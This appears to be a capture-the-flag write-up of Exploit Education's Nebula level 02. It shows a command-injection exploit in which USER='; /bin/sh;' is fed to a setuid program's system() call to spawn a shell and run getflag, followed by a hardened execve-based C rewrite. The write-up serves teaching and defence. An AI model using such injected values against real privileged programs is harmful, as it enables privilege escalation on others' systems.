Exploit-Education Nebula Level 02
Exploit Education Level 2
Challenge
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?
To do this level, log in as the level02 account with the password level02. Files for this level can be found in /home/flag02.
Vulnerability
This program is similar to the last challenge.
asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
printf("about to call system(\"%s\")\n", buffer);
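We can see here that the echo command is written into the buffer together with the value of the USER environment variable, and the buffer is then passed to system(). Because system() hands the whole string to a shell, the ; character acts as a command separator: if we replace the USER env variable with ;/bin/sh, a shell will be executed after the echo command.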
Exploitation
The flag02 program has the set-user-ID bit set:
-rwsr-x--- 1 flag02 level02 7438 2011-11-20 21:22 flag02
Let's add ; /bin/sh; to the env variable and execute the program:
level02@nebula:/home/flag02$ USER='; /bin/sh;'
level02@nebula:/home/flag02$ env | grep USER
USER=; /bin/sh;
level02@nebula:/home/flag02$ ./flag02
about to call system("/bin/echo ; /bin/sh; is cool")
sh-4.2$ getflag
You have successfully executed getflag on a target account
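
For comparison, a hardened form of the system() call shown above. This is an added example, not code from the challenge or from the original write-up. The helper name echo_is_cool and the 256-byte limit are assumptions. It runs /bin/echo through execve() with an argument array and an empty environment, so no shell parses the name, and its main() takes the name from the real UID instead of $USER.

```c
#include <pwd.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: prints "<user> is cool" by running /bin/echo directly,
 * so shell metacharacters in `user` are plain data. Captures echo's stdout in
 * `out` (NUL-terminated); returns echo's exit status, or -1 on error. */
int echo_is_cool(const char *user, char *out, size_t outlen)
{
    char msg[256];
    int fds[2];
    if (user == NULL || outlen == 0 || strlen(user) > sizeof msg - sizeof " is cool")
        return -1;                       /* unset name, or too long to format */
    snprintf(msg, sizeof msg, "%s is cool", user);
    if (pipe(fds) != 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0) {
        close(fds[0]); close(fds[1]);
        return -1;
    }
    if (pid == 0) {                      /* child: becomes /bin/echo */
        char *argv[] = { "/bin/echo", msg, NULL };
        char *envp[] = { NULL };         /* drop the caller's environment */
        dup2(fds[1], STDOUT_FILENO);
        close(fds[0]); close(fds[1]);
        execve("/bin/echo", argv, envp); /* absolute path, no PATH lookup */
        _exit(127);                      /* only reached if exec failed */
    }
    close(fds[1]);
    size_t n = 0;
    ssize_t r;
    while (n < outlen - 1 && (r = read(fds[0], out + n, outlen - 1 - n)) > 0)
        n += (size_t)r;
    out[n] = '\0';
    close(fds[0]);
    int status;
    return (waitpid(pid, &status, 0) == pid && WIFEXITED(status)) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char out[300];
    struct passwd *pw = getpwuid(getuid());  /* real UID, not caller-set $USER */
    if (echo_is_cool(pw ? pw->pw_name : NULL, out, sizeof out) != 0)
        return 1;
    return fputs(out, stdout) < 0;
}
```

Given the same input used in the session above, the string comes back verbatim as echo output and no second command runs.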